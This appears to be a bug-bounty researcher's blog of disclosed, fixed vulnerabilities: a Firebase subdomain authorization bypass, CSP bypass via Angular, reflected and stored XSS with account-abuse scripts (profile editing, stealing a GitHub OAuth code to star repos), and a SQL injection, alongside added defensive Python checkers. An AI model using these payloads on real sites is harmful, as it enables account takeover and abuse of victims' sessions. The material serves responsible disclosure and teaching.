Author: Thomas

Bypassing Firebase authorization to create custom subdomains

Since the support of has already ended, I’ve been looking for ways to shorten URLs using Google services.

Some time ago I found a bug that allowed me to shorten links using Google’s official shortener.

This time I took a look at Firebase Dynamic Links.

They work by allowing you to create short URLs on either * or * subdomains. Before subdomains in Firebase were discontinued, there was a randomly generated subdomain for each Firebase project, something like It could also be accessed via (=, but it doesn’t seem to work anymore.

You could also create four more * subdomains, but this time you could choose your own subdomain.

When I was setting up a new subdomain I noticed an interesting API call.


This returned an “OK” response in case the subdomain I wanted to create was both valid and not already in use.

In case it was “OK”, the “Create” button was enabled and I was able to create it. Otherwise it showed an error.

Once I clicked the button to create it, another API call was fired, this time to:


also containing the desired subdomain in its body.

If I let the POST call through, it would successfully add the subdomain to my project.

But let’s go back to the last API call. Since we know there are two types of domains we can use to shorten links in Firebase, let’s try to replace the value of the domainUriPrefix parameter from with

Surprisingly, this actually worked and an * subdomain was added and could be used in the project.

Custom * subdomains like or are used only for official Google products and can (should) be registered only by Google.

This leaves us with the following attack scenario:

A regular user can create custom subdomains on via the Firebase Console. This should be possible to do only by Google.



10.08.2018: Vuln reported
13.08.2018: Priority changed to P1
14.08.2018: Accepted
22.08.2018: Fixed
Follow me on Twitter: @ThomasOrlita




How to use Google’s CSP Evaluator to bypass CSP

You know that feeling when you discovered an XSS only to find out there’s an active CSP that blocks execution of any scripts?
If you want it to work on all browsers, not just IE (which doesn’t support CSP), there’s still a chance to bypass it!

Use Google’s CSP Evaluator to find ways to bypass CSP on websites using Angular libraries or JSONP endpoints.

It’s a really powerful and simple-to-use tool that helps you evaluate how effective these restrictions are,
useful both for website owners who want to improve the security of their website and for bug hunters looking for these flaws.

Also available as a Chrome Extension.

You can either paste the target URL or the CSP itself (which is in the content-security-policy header) into the textbox,
and it will evaluate potential problems in the CSP.

If we enter as our example URL, multiple errors appear:

We can see it found two high-severity findings.

The first one is that * hosts JSONP endpoints, that would allow us to bypass the CSP.

The second one is about * allowing us to load angular.js.
That means we would be able to load and use Angular and simply bypass the CSP.
This is how it could be done:

<script src=""></script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
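To see why those two findings matter for a policy author, here is a small checker I am adding to this post (it is not the CSP Evaluator’s code). It parses a Content-Security-Policy value, takes the sources that govern scripts, and flags the same classes of weakness the Evaluator reports: ‘unsafe-inline’ without a nonce or hash, scheme and wildcard sources, and allowlisted hosts that are known to serve JSONP endpoints or Angular builds. The two hosts in the table are constructed placeholders standing in for the real entries, which live in the GitHub list mentioned below; the sample policies are constructed too.

```python
"""Added example (not the CSP Evaluator's code): a checker for the script-src
weaknesses described in the post. The bypass-host table is a constructed
placeholder; the real list lives in the GitHub repository the post links."""
import re

# Constructed placeholder hosts standing in for origins known to serve JSONP
# endpoints or Angular builds; either one defeats an allowlist-based script-src.
KNOWN_BYPASS_HOSTS = {
    "api.jsonp.example": "hosts JSONP endpoints",
    "cdn.angular.example": "hosts angular.js (ng-csp runs attacker markup)",
}

NONCE_OR_HASH_RE = re.compile(r"^'(nonce-|sha(256|384|512)-)")


def parse_csp(header):
    """Parse a Content-Security-Policy value into {directive: [sources]}.
    Browsers ignore a repeated directive, so the first occurrence wins."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def host_covers(pattern, host):
    """Does a CSP host-source (possibly '*.example') cover a concrete host?"""
    p = re.sub(r"^[a-z][a-z0-9+.\-]*://", "", pattern.lower())
    p = p.split("/")[0].split(":")[0]
    if p == "*":
        return True
    if p.startswith("*."):
        return host.endswith(p[1:])   # '*.example' covers 'a.example', not 'example'
    return p == host


def evaluate_script_src(header):
    """Return a list of (severity, source, message) findings for the policy."""
    d = parse_csp(header)
    sources = d.get("script-src") or d.get("default-src")
    if not sources:
        return [("high", "(none)", "no script-src/default-src: scripts unrestricted")]
    lower = [s.lower() for s in sources]
    has_nonce_or_hash = any(NONCE_OR_HASH_RE.match(s) for s in lower)
    strict_dynamic = "'strict-dynamic'" in lower
    findings = []
    for src in lower:
        if src == "'unsafe-inline'":
            # With a nonce or hash present, CSP2+ browsers ignore 'unsafe-inline'
            # (it is kept only as a fallback for old browsers).
            if not has_nonce_or_hash:
                findings.append(("high", src, "inline scripts allowed"))
        elif src == "'unsafe-eval'":
            findings.append(("medium", src, "eval allowed"))
        elif src.startswith("'"):
            continue   # 'self', 'none', nonces, hashes, 'strict-dynamic'
        elif strict_dynamic:
            continue   # host allowlist is ignored once 'strict-dynamic' is present
        elif src in ("*", "http:", "https:", "data:"):
            findings.append(("high", src, "scheme or wildcard source allows any script"))
        else:
            for host, why in KNOWN_BYPASS_HOSTS.items():
                if host_covers(src, host):
                    findings.append(("high", src, host + " " + why))
    return findings


def count_high(header):
    return sum(1 for sev, _, _ in evaluate_script_src(header) if sev == "high")


# Constructed sample policies: the weak one reproduces the two kinds of finding
# from the post; the hardened one relies on a nonce plus 'strict-dynamic'.
WEAK_CSP = ("default-src 'self'; script-src 'self' https://cdn.angular.example "
            "*.jsonp.example 'unsafe-inline'")
HARDENED_CSP = ("script-src 'nonce-r4nd0m' 'strict-dynamic' 'unsafe-inline' https:; "
                "object-src 'none'")

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_CSP), ("hardened", HARDENED_CSP)):
        print(name)
        for finding in evaluate_script_src(policy):
            print("  ", finding)
```

The hardened policy shows the usual way out of allowlist bypasses: a per-response nonce plus ‘strict-dynamic’, after which host sources (and ‘unsafe-inline’) are only there for browsers that don’t understand CSP3 and are ignored by the ones that do.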


You can check out this list of known JSONP, Flash and Angular bypasses on Google’s GitHub page, and add new bypasses to the list:

CSP Evaluator is an open-source project by Google; the source code can be found on GitHub: lists CSP flaws in many popular websites.

Read more about how CSP works in this Google Developers article: Content Security Policy


Reflected XSS in Google Code Jam


Information about this XSS:

The XSS will be fired in the toast message.

Also, it seems like you have to open the homepage ( at least once before visiting other pages there.


Due to CSP, this XSS will fire only in browsers where it’s not supported (i.e. IE).

If we could somehow find a way to execute a script that has inserted dynamically, we could bypass (thanks to the CSP using the following payload. But I don’t think it’s possible in this case.

<script src=""></script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>

Read more about bypassing CSP in my other post.

Attack scenario:

An attacker can get access to the victim’s Code Jam account, for example to read and edit their profile information (address, phone number, etc.).

Here’s an example of how it could be done:

// go to profile page

  // change the username
  document.querySelector('#nickname').value = 'mynickname111';
  // create a fake input event 
  var event = document.createEvent("Event");
  event.initEvent('input', false, true); 
  // submit the form



29.08.2018: XSS reported
30.08.2018: Accepted
05.09.2018: Fixed


Liking GitHub repositories on behalf of other users — Stored XSS in



Steps to reproduce:

1. Create a Polymer element and publish it to GitHub
2. Set the repo homepage URL to: javascript:alert(document.domain)
3. Publish it via
4. Go to the element’s page and click the homepage link
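The root cause in those steps is that a user-controlled URL ends up in an href without its scheme being checked. As an added example (not the site’s code), here is how a server-side validator for such a “homepage” field can be written so that only absolute http(s) URLs are ever linked. It normalizes the input the way browsers do before scheme parsing (leading controls and spaces trimmed, tabs and newlines removed), so obfuscated variants of javascript: fold back to the real scheme; the inputs in the tests are constructed.

```python
"""Added example (not the site's code): accept a user-supplied homepage link
only if it is an absolute http(s) URL, so a javascript: value is never
rendered as an <a href>."""
import html
from urllib.parse import urlsplit

C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def normalize_url(raw):
    """Mimic the browser's pre-parse step: trim leading/trailing C0 controls
    and spaces, and drop ASCII tab/newline anywhere, so 'java\\tscript:'
    is seen as 'javascript:' rather than as an unknown scheme."""
    if not isinstance(raw, str):
        return ""
    stripped = raw.strip(C0_AND_SPACE)
    return stripped.replace("\t", "").replace("\n", "").replace("\r", "")


def safe_homepage_url(raw):
    """Return a canonical absolute URL, or None if the value must not be linked."""
    cleaned = normalize_url(raw)
    if not cleaned:
        return None
    parts = urlsplit(cleaned)
    # Rejects javascript:, data:, vbscript:, scheme-relative (//host) and
    # relative inputs alike: anything that is not http or https.
    if parts.scheme not in ("http", "https"):
        return None
    if not parts.hostname or parts.username or parts.password:
        return None
    try:
        port = parts.port          # raises ValueError for a non-numeric port
    except ValueError:
        return None
    url = parts.scheme + "://" + parts.hostname
    if port:
        url += ":" + str(port)
    url += parts.path or "/"
    if parts.query:
        url += "?" + parts.query
    return url                     # fragment intentionally dropped


def render_homepage_link(raw):
    """Emit the link with the value escaped for the attribute and text contexts."""
    href = safe_homepage_url(raw)
    if href is None:
        return "<span>(no homepage)</span>"
    safe = html.escape(href, quote=True)
    return '<a href="' + safe + '" rel="noopener noreferrer">' + safe + "</a>"


if __name__ == "__main__":
    for candidate in ("javascript:alert(document.domain)", "  JaVaScRiPt:alert(1)",
                      "java\tscript:alert(1)", "https://example.org/repo"):
        print(repr(candidate), "->", render_homepage_link(candidate))
```

An allowlist of schemes is the important part; a denylist of “javascript” spellings is what the normalization tricks are designed to get past.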




What you can do with this XSS:

It’s possible, if the user has authenticated using GitHub on before, to get the GitHub auth code and use it to star any public GitHub repo on behalf of the user.

It would work like this:
– create an iframe with the GitHub auth URL; if the user is already authenticated, it redirects us to and the auth code will be in the URL as ?code=123 (and we can access the iframe because it’s the same domain)
– use the code to post a request to‘s API to star a GitHub repo using the user’s account

Here’s an example:

// create an iframe with github authorization url
// that redirects us back to
var iframe;
iframe = document.createElement('iframe');
iframe.src = ''; = 'none';

// just wait some time till it's loaded and redirected
setTimeout(() => {
  // get the url that contains the authorization code from the iframe
  var url = new URL(iframe.contentWindow.location.href);
  var code = url.searchParams.get("code");

  // the github repo we want to star
  var repo_to_star = 'kelseyhightower/nocode';

  // make a post request using the code
  fetch('/api/star/' + repo_to_star + '?code=' + code, {
    method: 'POST'
  });
}, 5000);



12.08.2018: XSS reported
16.08.2018: Added more info
20.08.2018: Accepted
22.08.2018: Fixed



Stored Angular XSS in

Problems: XSS (stored)
Reward: None
Fixed: Yes



SQLi at Maxon

Vulnerable URL:

If you enter ‘ (a single quote) into the input field, it’ll show:

query failed1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ””’ at line 1
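That error is the signature of user input being concatenated straight into the SQL string. As an added example (not Maxon’s code), here is the same kind of lookup written both ways against a constructed in-memory SQLite table: the concatenating version fails on a single quote exactly like the page above (SQLite words the error differently from MySQL, but the mechanism is the same), while the parameterized version treats the quote as data. The table contents and search terms are constructed sample data.

```python
"""Added example (not Maxon's code): a product search written with string
concatenation and with a bound parameter, run against constructed sample
data in an in-memory SQLite database."""
import sqlite3


def make_db():
    """Constructed sample data; nothing here comes from the real site."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO products (name, price) VALUES (?, ?)",
        [("widget", 9.5), ("gadget", 12.0), ("o'ring", 0.5)],
    )
    return conn


def search_vulnerable(conn, term):
    """User input is pasted into the statement. A lone single quote breaks the
    string literal and the database error is what the page shows; other input
    rewrites the WHERE clause instead of being searched for."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%' ORDER BY name"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "query failed: " + str(exc)   # the leak the error message above shows


def escape_like(term):
    """LIKE has its own wildcards; escape them so the term cannot match everything."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn, term):
    """The term is bound as a parameter: the driver sends it as data, so a quote
    (or anything else) can never become SQL syntax."""
    sql = "SELECT name FROM products WHERE name LIKE ? ESCAPE '\\' ORDER BY name"
    return [row[0] for row in conn.execute(sql, ("%" + escape_like(term) + "%",))]


if __name__ == "__main__":
    db = make_db()
    for term in ("'", "get", "' OR '1'='1"):
        print(repr(term), "->", search_vulnerable(db, term), "|", search_safe(db, term))
```

Beyond binding parameters, the other fix visible in the page above is not echoing the driver’s error text to the user: a generic message for the client and the real one in the server log.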



Problems: SQLi
Reward: None
Fixed: Yes



Easy way to auto-refresh POP3 accounts in Gmail every 5 minutes


► IFTTT Applet:…

► Feed URL:…

► Email address format:

► Email title: mailchecker_DELETETHIS

► Body: POP3 mailchecker_DELETETHIS from

► Gmail filter: to:(


Zhiyun Smooth Q – Video Footage Comparison


Angular XSS vulnerability on

I reported this vulnerability on

Previously fixed vulnerabilities on



My blog

Coming soon… 🙂